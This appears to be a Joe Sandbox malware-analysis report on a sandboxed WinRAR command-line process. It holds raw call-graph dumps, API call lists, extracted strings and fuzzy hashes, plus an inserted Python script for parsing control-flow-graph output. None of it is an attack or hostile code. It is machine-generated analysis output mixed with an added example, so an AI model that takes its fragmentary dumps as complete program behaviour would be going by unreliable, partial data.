38529->38533 38532->38526 38538 7ff6faa86938 EnterCriticalSection 38533->38538 38535 7ff6faa8370d 38536 7ff6faa86998 fflush LeaveCriticalSection 38535->38536 38537 7ff6faa836d2 38536->38537 38537->38527 38540 7ff6faa57e45 38539->38540 38541 7ff6faa6b496 GetProcAddress 38539->38541 38544 7ff6faa37a68 38540->38544 38542 7ff6faa6b4cb GetProcAddress 38541->38542 38543 7ff6faa6b4ae 38541->38543 38542->38540 38543->38542 38545 7ff6faa37a76 38544->38545 38565 7ff6faa82ae4 38545->38565 38547 7ff6faa37a80 38548 7ff6faa82ae4 setbuf 60 API calls 38547->38548 38549 7ff6faa37a94 38548->38549 38574 7ff6faa37b44 GetStdHandle GetFileType 38549->38574 38552 7ff6faa37b44 3 API calls 38553 7ff6faa37aae 38552->38553 38554 7ff6faa37b44 3 API calls 38553->38554 38556 7ff6faa37abe 38554->38556 38555 7ff6faa37b12 38564 7ff6faa3cd78 SetConsoleCtrlHandler 38555->38564 38558 7ff6faa37aeb 38556->38558 38577 7ff6faa82abc 31 API calls 2 library calls 38556->38577 38558->38555 38579 7ff6faa82abc 31 API calls 2 library calls 38558->38579 38559 7ff6faa37adf 38578 7ff6faa82b40 33 API calls 2 library calls 38559->38578 38562 7ff6faa37b06 38580 7ff6faa82b40 33 API calls 2 library calls 38562->38580 38566 7ff6faa82ae9 38565->38566 38567 7ff6faa87ee8 38566->38567 38570 7ff6faa87f23 38566->38570 38581 7ff6faa84f3c 15 API calls setbuf 38567->38581 38569 7ff6faa87eed 38582 7ff6faa84e1c 31 API calls _invalid_parameter_noinfo 38569->38582 38583 7ff6faa87d98 60 API calls 2 library calls 38570->38583 38573 7ff6faa87ef8 38573->38547 38575 7ff6faa37b61 GetConsoleMode 38574->38575 38576 7ff6faa37a9e 38574->38576 38575->38576 38576->38552 38577->38559 38578->38558 38579->38562 38580->38555 38581->38569 38582->38573 38583->38573 38584 7ff6faa27a5b 38585 7ff6faa27a60 38584->38585 38587 7ff6faa27af7 38585->38587 38617 7ff6faa39be0 38585->38617 38588 7ff6faa27bda 38587->38588 38720 7ff6faa41e1c GetFileTime 38587->38720 38628 7ff6faa2b540 38588->38628 38593 7ff6faa2b540 147 API calls 38596 7ff6faa27c9c 38593->38596 
38594 7ff6faa27c3e 38594->38593 38595 7ff6faa27f89 38596->38595 38722 7ff6faa46378 38596->38722 38598 7ff6faa27cd7 38599 7ff6faa46378 4 API calls 38598->38599 38601 7ff6faa27cf3 38599->38601 38600 7ff6faa27de1 38607 7ff6faa27e4e 38600->38607 38733 7ff6faa598dc 38600->38733 38601->38600 38602 7ff6faa27d59 38601->38602 38603 7ff6faa27d38 38601->38603 38606 7ff6faa7a444 new 4 API calls 38602->38606 38726 7ff6faa7a444 38603->38726 38611 7ff6faa27d42 std::bad_alloc::bad_alloc 38606->38611 38739 7ff6faa21204 48 API calls 38607->38739 38609 7ff6faa27eb3 38612 7ff6faa27edb 38609->38612 38740 7ff6faa59680 38609->38740 38611->38600 38732 7ff6faa7ba34 RtlPcToFileHeader RaiseException 38611->38732 38746 7ff6faa46424 8 API calls _UnwindNestedFrames 38612->38746 38614 7ff6faa27f56 38616 7ff6faa2b540 147 API calls 38614->38616 38616->38595 38747 7ff6faa3901c CryptAcquireContextW 38617->38747 38621 7ff6faa39c2a 38757 7ff6faa69ce4 38621->38757 38625 7ff6faa39c5b memcpy_s 38767 7ff6faa7a610 38625->38767 38632 7ff6faa2b55f setbuf 38628->38632 38629 7ff6faa2b5a1 38630 7ff6faa2b5d8 38629->38630 38631 7ff6faa2b5b8 38629->38631 38906 7ff6faa58c1c 38630->38906 38792 7ff6faa2aba0 38631->38792 38632->38629 38788 7ff6faa2a4d0 38632->38788 38634 7ff6faa2b5d3 38636 7ff6faa7a610 _UnwindNestedFrames 8 API calls 38634->38636 38637 7ff6faa27bf8 38636->38637 38637->38594 38721 7ff6faa79b98 216 API calls 3 library calls 38637->38721 38638 7ff6faa2bbae 38641 7ff6faa58d00 48 API calls 38638->38641 38639 7ff6faa2b6a5 38639->38634 38651 7ff6faa2b6b5 38639->38651 38670 7ff6faa2b79f 38639->38670 38640 7ff6faa42574 126 API calls 38640->38634 38643 7ff6faa2bc5c 38641->38643 38975 7ff6faa58d38 48 API calls 38643->38975 38647 7ff6faa2bc69 38976 7ff6faa58d38 48 API calls 38647->38976 38650 7ff6faa2b67f 38650->38638 38650->38639 38658 7ff6faa2bc91 38650->38658 38651->38634 38940 7ff6faa58d00 38651->38940 38652 7ff6faa2bc76 38977 7ff6faa58d38 48 API calls 38652->38977 38654 7ff6faa2bc84 38978 7ff6faa58d88 48 API 
7ff6faa67d80 39793->39803 39799 7ff6faa64b2b 39798->39799 39800 7ff6faa64b26 39798->39800 39799->39775 39802 7ff6faa64b38 8 API calls _UnwindNestedFrames 39800->39802 39802->39799 39810 7ff6faa68094 39803->39810 39806 7ff6faa48a44 39807 7ff6faa48a5a memcpy_s 39806->39807 39814 7ff6faa6bac4 39807->39814 39811 7ff6faa6809f 39810->39811 39812 7ff6faa67ec8 68 API calls 39811->39812 39813 7ff6faa4896e 39812->39813 39813->39806 39817 7ff6faa6ba70 GetCurrentProcess GetProcessAffinityMask 39814->39817 39816 7ff6faa489c5 39816->39595 39818 7ff6faa6ba96 39817->39818 39818->39816 39818->39818 39821 7ff6faa59245 39819->39821 39827 7ff6faa46194 72 API calls 39821->39827 39822 7ff6faa592b1 39828 7ff6faa46194 72 API calls 39822->39828 39824 7ff6faa592bd 39829 7ff6faa46194 72 API calls 39824->39829 39826 7ff6faa592c9 39827->39822 39828->39824 39829->39826 39830->39606 39831->39609 39832->39612 39833->39615 39834->39604 39835->39607 39836->39605 39837->39619
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: 565280187a245d7692cc6fbdfa612b83b417dfc8b05aded54c0d159ed034c0ba
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: F9C2D672D0C38385FB649F2881461BE66A1AF01784F9590B5CAAEC72C5FE6FE54ED310
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149
• Opcode ID: 7713fc30a0949132ff6f2d98c66cd83d2205d8834f017a1a320264aa9ffc92fa
• Instruction ID: 9649c9ddc0d53c6be0295bdaee2b227859a4b0766a97e8bc5a634bb5ad39de74
• Opcode Fuzzy Hash: 7713fc30a0949132ff6f2d98c66cd83d2205d8834f017a1a320264aa9ffc92fa
• Instruction Fuzzy Hash: 9BE29136A09AC285EB20DF26D8401FD27A1FB85788F454075DA6D87BDAEF39D56EC300

Control-flow Graph

APIs
• Part of subcall function 00007FF6FAA64AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6FAA3CC90), ref: 00007FF6FAA64AF5
• GetModuleFileNameW.KERNEL32(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA6492E
• GetVersionExW.KERNEL32(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA6496A
• LoadLibraryExW.KERNELBASE(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA64993
• LoadLibraryW.KERNEL32(?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA6499F
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Library$Load$FileFreeModuleNameVersion
• String ID: rarlng.dll
• API String ID: 2520153904-1675521814
• Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
• Instruction ID: c9135ff9c91f70d2a6a0ffcc187f87a0c810019fd02d268026e5f47791ad7969
• Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
• Instruction Fuzzy Hash: 02319032628A4296FB649F25E9402E92360FB45784F8041B5EA5D837D8FF3DD58FCB00

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA44736
• FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA4476B
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA4477A
• FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA447A4
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6FAA44620,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA447B2
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 869497890-0
                                                                                                                                                                                                                                • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                • Instruction ID: b421f5682a7159234303d82b5f55ba90d8c174071233ad4dd75be2aaece21208
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9419032A08A8197EB649B25E5402E963A0FB497B4F404371FE7D837D9EF6CE55E8700
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction ID: 31d4929faeaff05e12b9893b71ea201c66a1c4fb34fb58599545784934a451d8
• Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction Fuzzy Hash: 17016D2AB0865082EB408B16A9553296761EBC5FD0F188071DE9E83BA8DF7ED95A8700
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Char
• String ID:
• API String ID: 751630497-0
• Opcode ID: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
• Instruction ID: bc3c52c0802db4a5a76aacf5aef60d24de070fd69328920a0c5aa4f26ff08921
• Opcode Fuzzy Hash: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
• Instruction Fuzzy Hash: AB22C132A086829AE714DF31D4411FEBBE0FB44748F484076DA9D872D9EE7CE95ACB40
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 14cfdc3b074ce30e7abac2d939f6e9d98027489a61441e2478d82fe2504e34b6
• Instruction ID: 5f6c7d3d09310c780e17af044cd92b1eb4f197bbe2c99a83477e626fcecbefa6
• Opcode Fuzzy Hash: 14cfdc3b074ce30e7abac2d939f6e9d98027489a61441e2478d82fe2504e34b6
• Instruction Fuzzy Hash: DF71CF32B15A8586D744DF29E4052ED3391FB88B98F044139DF6DCB3D9EF79A0468790

Control-flow Graph
(rendered graph omitted; the original colours each basic block as Executed or Not Executed)
• Function at 7ff6faa63ea8; entry block 7ff6faa63ea8-7ff6faa63f03, common exit block (no successors) 7ff6faa64692-7ff6faa646c5
• The only imported API called within the graph is GetModuleFileNameW (block 7ff6faa63f05-7ff6faa63f3e); every other call target lies inside the module mapped at 7ff6faa20000
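Joe Sandbox renders its control-flow graphs from a textual `control_flow_graph` token stream of the kind this report carries for the function at 7ff6faa63ea8. As an added example (not Joe Sandbox code, and not part of the original report), the script below parses that stream into an adjacency list and answers the questions an analyst actually asks of it: which blocks call an imported API, which blocks are unreachable from the entry, and which blocks have no successors. The token grammar is inferred from this report's dump; the sample input is a constructed, truncated excerpt of the first blocks and edges of that function plus one made-up orphan block (id 999, invented address range) so the reachability check has something to flag.

```python
"""Parse a Joe Sandbox `control_flow_graph` token stream into an adjacency list.

Added example; not Joe Sandbox code. The grammar is inferred from the dump in
this report: `<id> <start>-<end>` opens a basic block, `call <addr>` records a
call (an optional `* <n>` gives the repeat count), a bare identifier such as
GetModuleFileNameW records an imported API, and `<src>-><dst>` is an edge.
"""
import re
from dataclasses import dataclass, field

# Constructed input: a truncated excerpt of the first blocks/edges of the
# function at 7ff6faa63ea8 from this report, plus a made-up orphan block
# (id 999, address range invented) so the reachability check has a hit.
SAMPLE_DUMP = (
    "control_flow_graph "
    "635 7ff6faa63ea8-7ff6faa63f03 call 7ff6faa7a5a0 call 7ff6faa7c8a0 "
    "640 7ff6faa63f05-7ff6faa63f3e GetModuleFileNameW call 7ff6faa54e14 call 7ff6faa6a9c0 635->640 "
    "641 7ff6faa63f40-7ff6faa63f50 call 7ff6faa6a9e8 635->641 "
    "645 7ff6faa63f55-7ff6faa63f79 call 7ff6faa41874 call 7ff6faa41e80 640->645 641->645 "
    "652 7ff6faa64692-7ff6faa646c5 call 7ff6faa418ac call 7ff6faa7a610 645->652 "
    "653 7ff6faa63f7f-7ff6faa63f89 645->653 "
    "654 7ff6faa63f8b-7ff6faa63fac call 7ff6faa611c0 * 2 653->654 "
    "999 7ff6faa99000-7ff6faa99010 call 7ff6faa41874"
)

_ID = re.compile(r"^\d+$")
_RANGE = re.compile(r"^([0-9a-fA-F]+)-([0-9a-fA-F]+)$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # [target, count]; target is int address or API name
    succ: list = field(default_factory=list)   # successor block ids


def parse_cfg(dump: str) -> dict:
    """Tokenise the dump and return {block_id: Block}."""
    blocks, cur, toks, i = {}, None, dump.split(), 0
    while i < len(toks):
        t = toks[i]
        edge = _EDGE.match(t)
        if edge:                                   # <src>-><dst>
            blocks[int(edge.group(1))].succ.append(int(edge.group(2)))
        elif t == "call":                          # call <addr>
            cur.calls.append([int(toks[i + 1], 16), 1])
            i += 1
        elif t == "*":                             # * <n> repeats the previous call
            cur.calls[-1][1] = int(toks[i + 1])
            i += 1
        elif _ID.match(t):                         # <id> <start>-<end> opens a block
            rng = _RANGE.match(toks[i + 1])
            cur = Block(int(t), int(rng.group(1), 16), int(rng.group(2), 16))
            blocks[cur.bid] = cur
            i += 1
        elif t != "control_flow_graph":            # bare identifier = imported API
            cur.calls.append([t, 1])
        i += 1
    return blocks


def entry_block(blocks: dict) -> int:
    """The block with the lowest start address is the function entry."""
    return min(blocks, key=lambda b: blocks[b].start)


def api_calls(blocks: dict) -> dict:
    """Blocks that call an imported (named) API, mapped to the API names."""
    out = {}
    for b in blocks.values():
        names = [c for c, _ in b.calls if isinstance(c, str)]
        if names:
            out[b.bid] = names
    return out


def reachable(blocks: dict, entry: int) -> set:
    """Depth-first walk over successor edges from `entry`."""
    seen, stack = set(), [entry]
    while stack:
        n = stack.pop()
        if n in seen or n not in blocks:
            continue
        seen.add(n)
        stack.extend(blocks[n].succ)
    return seen


def unreachable(blocks: dict, entry: int) -> list:
    return sorted(set(blocks) - reachable(blocks, entry))


def exit_blocks(blocks: dict) -> list:
    return sorted(b.bid for b in blocks.values() if not b.succ)


def summarize(dump: str) -> dict:
    blocks = parse_cfg(dump)
    entry = entry_block(blocks)
    return {"blocks": len(blocks), "entry": entry, "api_calls": api_calls(blocks),
            "unreachable": unreachable(blocks, entry), "exits": exit_blocks(blocks)}


if __name__ == "__main__":
    for k, v in summarize(SAMPLE_DUMP).items():
        print(f"{k}: {v}")
```

Paste the full `control_flow_graph ...` text from a report into `parse_cfg` to get the same view for the whole function; `api_calls` then lists every block that touches an import, which is the quickest way to locate the interesting code in a large graph.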
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction ID: 9906367a6f9fc15994f231b8bf9879114f345c68756bf418e98d165d7d60c426
• Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction Fuzzy Hash: E922E432A1868286EB20DB19D5402F92761FF46784F805175EA6EC77D9FF3CE94ACB40

Control-flow Graph
APIs
Strings
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: b99889502454f512b3e7ee31c3a3e3a5ea5264d9b2d73083dc49dc29d5b65b2d
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: DCC1A961A1C78358EB65AF29C4521FC1355EF46784F4441B1DABECA6DAFE2EE60BC300

Control-flow Graph
APIs
Strings
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: 69c7c7a44517c66247d8e42866342d95f5a045ab72b89ebc59f63a7d976f539d
• Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction Fuzzy Hash: 81417820B08B8281FB42CB1AA90087567A1AF4ABD4F0911B1CC7D877E8FF7DE05B8700

Control-flow Graph

APIs
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 552178382-0
                                                                                                                                                                                                                                • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                • Instruction ID: be9e56524e6ea4d9ff608b3cae04fe54619bd2d9bbef5e3a56f6ca747208dbce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC314F71E0D28346FB14AB25E5113BA1391AF45784F4454B8EA6EC76DBFE2DE80F8350

                                                                                                                                                                                                                                Control-flow Graph

APIs
